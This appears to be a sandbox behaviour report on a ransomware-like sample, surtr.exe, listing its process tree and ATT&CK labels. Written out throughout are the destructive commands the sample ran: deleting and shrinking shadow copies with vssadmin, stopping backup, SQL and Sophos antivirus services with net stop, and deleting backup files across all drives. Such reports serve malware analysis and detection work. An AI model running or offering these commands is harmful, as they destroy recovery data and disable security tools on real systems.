PID 956 wrote to memory of 1228	956	surtr.exe	cmd.exe
PID 956 wrote to memory of 1228	956	surtr.exe	cmd.exe
PID 956 wrote to memory of 1228	956	surtr.exe	cmd.exe
PID 956 wrote to memory of 1784	956	surtr.exe	cmd.exe
PID 956 wrote to memory of 1784	956	surtr.exe	cmd.exe
PID 956 wrote to memory of 1784	956	surtr.exe	cmd.exe
PID 956 wrote to memory of 1356	956	surtr.exe	cmd.exe
PID 956 wrote to memory of 1356	956	surtr.exe	cmd.exe
PID 956 wrote to memory of 1356	956	surtr.exe	cmd.exe
PID 956 wrote to memory of 1812	956	surtr.exe	cmd.exe
PID 956 wrote to memory of 1812	956	surtr.exe	cmd.exe
PID 956 wrote to memory of 1812	956	surtr.exe	cmd.exe
PID 956 wrote to memory of 416	956	surtr.exe	cmd.exe
PID 956 wrote to memory of 416	956	surtr.exe	cmd.exe
PID 956 wrote to memory of 416	956	surtr.exe	cmd.exe
PID 956 wrote to memory of 1640	956	surtr.exe	cmd.exe
PID 956 wrote to memory of 1640	956	surtr.exe	cmd.exe
PID 956 wrote to memory of 1640	956	surtr.exe	cmd.exe
PID 956 wrote to memory of 1468	956	surtr.exe	cmd.exe
PID 956 wrote to memory of 1468	956	surtr.exe	cmd.exe
PID 956 wrote to memory of 1468	956	surtr.exe	cmd.exe
PID 956 wrote to memory of 1484	956	surtr.exe	cmd.exe
PID 956 wrote to memory of 1484	956	surtr.exe	cmd.exe
PID 956 wrote to memory of 1484	956	surtr.exe	cmd.exe
PID 956 wrote to memory of 1476	956	surtr.exe	cmd.exe
PID 956 wrote to memory of 1476	956	surtr.exe	cmd.exe
PID 956 wrote to memory of 1476	956	surtr.exe	cmd.exe
PID 956 wrote to memory of 1860	956	surtr.exe	cmd.exe
PID 956 wrote to memory of 1860	956	surtr.exe	cmd.exe
PID 956 wrote to memory of 1860	956	surtr.exe	cmd.exe
PID 956 wrote to memory of 1500	956	surtr.exe	cmd.exe
PID 956 wrote to memory of 1500	956	surtr.exe	cmd.exe
PID 956 wrote to memory of 1500	956	surtr.exe	cmd.exe
PID 956 wrote to memory of 1200	956	surtr.exe	cmd.exe
PID 956 wrote to memory of 1200	956	surtr.exe	cmd.exe
PID 956 wrote to memory of 1200	956	surtr.exe	cmd.exe
PID 956 wrote to memory of 1824	956	surtr.exe	cmd.exe
PID 956 wrote to memory of 1824	956	surtr.exe	cmd.exe
PID 956 wrote to memory of 1824	956	surtr.exe	cmd.exe
PID 956 wrote to memory of 992	956	surtr.exe	cmd.exe
PID 956 wrote to memory of 992	956	surtr.exe	cmd.exe
PID 956 wrote to memory of 992	956	surtr.exe	cmd.exe
PID 956 wrote to memory of 1736	956	surtr.exe	cmd.exe
PID 956 wrote to memory of 1736	956	surtr.exe	cmd.exe
PID 956 wrote to memory of 1736	956	surtr.exe	cmd.exe

Views/modifies file attributes 1 TTPs 8 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exe

pid process

2372
1640
1828
3476
1924
212
2504 attrib.exe
1524 attrib.exe

pid	process
2372
1640
1828
3476
1924
212
2504	attrib.exe
1524	attrib.exe

C:\Users\Admin\AppData\Local\Temp\surtr.exe
"C:\Users\Admin\AppData\Local\Temp\surtr.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1448

C:\Users\Admin\AppData\Local\Temp\surtr.exe
"C:\Users\Admin\AppData\Local\Temp\surtr.exe"
2⤵
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:956

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c mkdir C:\ProgramData\Service
3⤵
PID:468

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c echo off
3⤵
PID:524

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c chcp 437
3⤵
- Suspicious use of WriteProcessMemory
PID:360

C:\Windows\system32\chcp.com
chcp 437
4⤵
PID:736

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB
3⤵
PID:1532

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB
4⤵
PID:1448

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB
5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1108

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB
3⤵
PID:1388

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB
4⤵
PID:816

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB
5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2104

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB
3⤵
PID:1552

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB
4⤵
PID:760

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB
5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:888

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
3⤵
PID:1716

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
4⤵
PID:1608

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
5⤵
- Interacts with shadow copies
PID:2052

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB
3⤵
PID:1888

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB
4⤵
PID:2036

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB
5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2468

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB
3⤵
PID:544

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB
4⤵
PID:556

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB
5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2112

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB
3⤵
PID:1408

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB
4⤵
PID:1580

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB
5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2060

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB
3⤵
PID:812

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB
4⤵
PID:1772

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB
5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1676

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB
3⤵
PID:1636

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB
4⤵
PID:1988

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB
5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2204

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB
3⤵
PID:1944

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB
4⤵
PID:1012

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB
5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2092

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB
3⤵
PID:1756

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB
4⤵
PID:1752

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB
5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2152

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin Delete Shadows /all /quiet
3⤵
PID:1728

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c vssadmin Delete Shadows /all /quiet
4⤵
PID:532

C:\Windows\system32\vssadmin.exe
vssadmin Delete Shadows /all /quiet
5⤵
- Interacts with shadow copies
PID:2084

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB
3⤵
PID:1736

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB
4⤵
PID:868

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB
5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2188

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB
3⤵
PID:1824

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB
4⤵
PID:2248

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB
5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2364

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB
3⤵
PID:592

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB
4⤵
PID:108

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB
5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2180

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB
3⤵
PID:992

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB
4⤵
PID:1912

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB
5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2480

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2008R2"
6⤵
PID:1340

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB
3⤵
PID:1200

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB
4⤵
PID:776

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB
5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:520

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB
3⤵
PID:1500

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB
4⤵
PID:2228

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB
5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2380

C:\Windows\system32\net.exe
net stop "MSSQL$VEEAMSQL2008R2"
4⤵
PID:2480

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB
3⤵
PID:1476

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB
4⤵
PID:792

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB
5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2120

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB
3⤵
PID:1860

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB
4⤵
PID:2236

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB
5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2488

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB
3⤵
PID:1484

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB
4⤵
PID:2220

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB
5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2412

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB
3⤵
PID:1468

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB
4⤵
PID:2264

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB
5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2332

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB
3⤵
PID:1640

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB
4⤵
PID:2212

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB
5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2372

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB
3⤵
PID:416

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB
4⤵
PID:2256

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB
5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2504

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB
3⤵
PID:1812

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB
4⤵
PID:1900

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB
5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2168

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
3⤵
PID:1356

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
4⤵
PID:1460

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2128

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=D:\ /on=D:\ /maxsize=401MB
3⤵
PID:1784

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=D:\ /on=D:\ /maxsize=401MB
4⤵
PID:1056

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=D:\ /on=D:\ /maxsize=401MB
5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2140

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "Acronis VSS Provider"
3⤵
PID:1228

C:\Windows\system32\net.exe
net stop "Acronis VSS Provider"
4⤵
PID:1480

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Acronis VSS Provider"
5⤵
PID:2320

C:\Windows\system32\net.exe
net stop "MSSQL$TPS"
4⤵
PID:2484

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop " Enterprise Client Service"
3⤵
PID:2340

C:\Windows\system32\net.exe
net stop " Enterprise Client Service"
4⤵
PID:2388

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop " Enterprise Client Service"
5⤵
PID:2448

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "Sophos Agent"
3⤵
PID:2496

C:\Windows\system32\net.exe
net stop "Sophos Agent"
4⤵
PID:2512

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos Agent"
5⤵
PID:2520

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "Sophos AutoUpdate Service"
3⤵
PID:2528

C:\Windows\system32\net.exe
net stop "Sophos AutoUpdate Service"
4⤵
PID:2536

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos AutoUpdate Service"
5⤵
PID:2544

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSSQL$SHAREPOINT"
6⤵
PID:2508

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSSQL$SBSMONITORING"
5⤵
PID:2384

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "Sophos Clean Service"
3⤵
PID:2560

C:\Windows\system32\net.exe
net stop "Sophos Clean Service"
4⤵
PID:2572

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos Clean Service"
5⤵
PID:2580

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "Sophos Device Control Service"
3⤵
PID:2608

C:\Windows\system32\net.exe
net stop "Sophos Device Control Service"
4⤵
PID:2624

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos Device Control Service"
5⤵
PID:2656

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "Sophos File Scanner Service"
3⤵
PID:2672

C:\Windows\system32\net.exe
net stop "Sophos File Scanner Service"
4⤵
PID:2716

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos File Scanner Service"
5⤵
PID:2736

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "Sophos Health Service"
3⤵
PID:2872

C:\Windows\system32\net.exe
net stop "Sophos Health Service"
4⤵
PID:2916

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos Health Service"
5⤵
PID:2992

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "Sophos MCS Agent"
3⤵
PID:3000

C:\Windows\system32\net.exe
net stop "Sophos MCS Agent"
4⤵
PID:3020

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos MCS Agent"
5⤵
PID:3040

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "Sophos MCS Client"
3⤵
PID:3048

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "Sophos Message Router"
3⤵
PID:2080

C:\Windows\system32\net.exe
net stop "Sophos Message Router"
4⤵
PID:2176

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos Message Router"
5⤵
PID:2292

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "Sophos Safestore Service"
3⤵
PID:2452

C:\Windows\system32\net.exe
net stop "Sophos Safestore Service"
4⤵
PID:2524

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos Safestore Service"
5⤵
PID:2500

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "Sophos System Protection Service"
3⤵
PID:2580

C:\Windows\system32\net.exe
net stop "Sophos System Protection Service"
4⤵
PID:2660

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos System Protection Service"
5⤵
PID:2628

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "Sophos Web Control Service"
3⤵
PID:2740

C:\Windows\system32\net.exe
net stop "Sophos Web Control Service"
4⤵
PID:2720

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos Web Control Service"
5⤵
PID:2996

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SQLsafe Backup Service"
3⤵
PID:2872

C:\Windows\system32\net.exe
net stop "SQLsafe Backup Service"
4⤵
PID:3020

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SQLsafe Backup Service"
5⤵
PID:3060

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SQLsafe Filter Service"
3⤵
PID:2452

C:\Windows\system32\net.exe
net stop "SQLsafe Filter Service"
4⤵
PID:2576

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SQLsafe Filter Service"
5⤵
PID:1144

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "Symantec System Recovery"
3⤵
PID:2720

C:\Windows\system32\net.exe
net stop "Symantec System Recovery"
4⤵
PID:2740

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Symantec System Recovery"
5⤵
PID:3056

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "Veeam Backup Catalog Data Service"
3⤵
PID:3020

C:\Windows\system32\net.exe
net stop "Veeam Backup Catalog Data Service"
4⤵
PID:1144

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Veeam Backup Catalog Data Service"
5⤵
PID:2624

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "AcronisAgent"
3⤵
PID:2736

C:\Windows\system32\net.exe
net stop "AcronisAgent"
4⤵
PID:2452

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "AcronisAgent"
5⤵
PID:1144

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "AcrSch2Svc"
3⤵
PID:2740

C:\Windows\system32\net.exe
net stop "AcrSch2Svc"
4⤵
PID:1144

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "AcrSch2Svc"
5⤵
PID:2452

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "Antivirus"
3⤵
PID:2736

C:\Windows\system32\net.exe
net stop "Antivirus"
4⤵
PID:2452

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Antivirus"
5⤵
PID:1144

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "BackupExecAgentAccelerator"
3⤵
PID:2740

C:\Windows\system32\net.exe
net stop "BackupExecAgentAccelerator"
4⤵
PID:1144

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "BackupExecAgentAccelerator"
5⤵
PID:2452

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "BackupExecAgentBrowser"
3⤵
PID:2736

C:\Windows\system32\net.exe
net stop "BackupExecAgentBrowser"
4⤵
PID:2452

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "BackupExecAgentBrowser"
5⤵
PID:1144

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "BackupExecDeviceMediaService"
3⤵
PID:2740

C:\Windows\system32\net.exe
net stop "BackupExecDeviceMediaService"
4⤵
PID:2452

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "BackupExecDeviceMediaService"
5⤵
PID:3076

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q Z:\*.bac Z:\*.bak Z:\Backup*.* Z:\backup*.*
3⤵
PID:3172

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q F:\*.bac F:\*.bak F:\Backup*.* F:\backup*.*
3⤵
PID:3180

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q P:\*.bac P:\*.bak P:\Backup*.* P:\backup*.*
3⤵
PID:3204

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q R:\*.bac R:\*.bak R:\Backup*.* R:\backup*.*
3⤵
PID:3212

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q E:\*.bac E:\*.bak E:\Backup*.* E:\backup*.*
3⤵
PID:3232

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "BackupExecJobEngine"
3⤵
PID:3220

C:\Windows\system32\net.exe
net stop "BackupExecJobEngine"
4⤵
PID:3264

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "BackupExecJobEngine"
5⤵
PID:3300

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q J:\*.bac J:\*.bak J:\Backup*.* J:\backup*.*
3⤵
PID:3196

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q B:\*.bac B:\*.bak B:\Backup*.* B:\backup*.*
3⤵
PID:3188

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q V:\*.bac V:\*.bak V:\Backup*.* V:\backup*.*
3⤵
PID:3240

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q W:\*.bac W:\*.bak W:\Backup*.* W:\backup*.*
3⤵
PID:3248

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q Q:\*.bac Q:\*.bak Q:\Backup*.* Q:\backup*.*
3⤵
PID:3256

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q A:\*.bac A:\*.bak A:\Backup*.* A:\backup*.*
3⤵
PID:3292

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q U:\*.bac U:\*.bak U:\Backup*.* U:\backup*.*
3⤵
PID:3280

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q T:\*.bac T:\*.bak T:\Backup*.* T:\backup*.*
3⤵
PID:3272

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "BackupExecManagementService"
3⤵
PID:3312

C:\Windows\system32\net.exe
net stop "BackupExecManagementService"
4⤵
PID:3324

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "BackupExecManagementService"
5⤵
PID:3364

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q L:\*.bac L:\*.bak L:\Backup*.* L:\backup*.*
3⤵
PID:3372

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q C:\*.bac C:\*.bak C:\Backup*.* C:\backup*.*
3⤵
PID:3356

C:\Windows\system32\cmd.exe
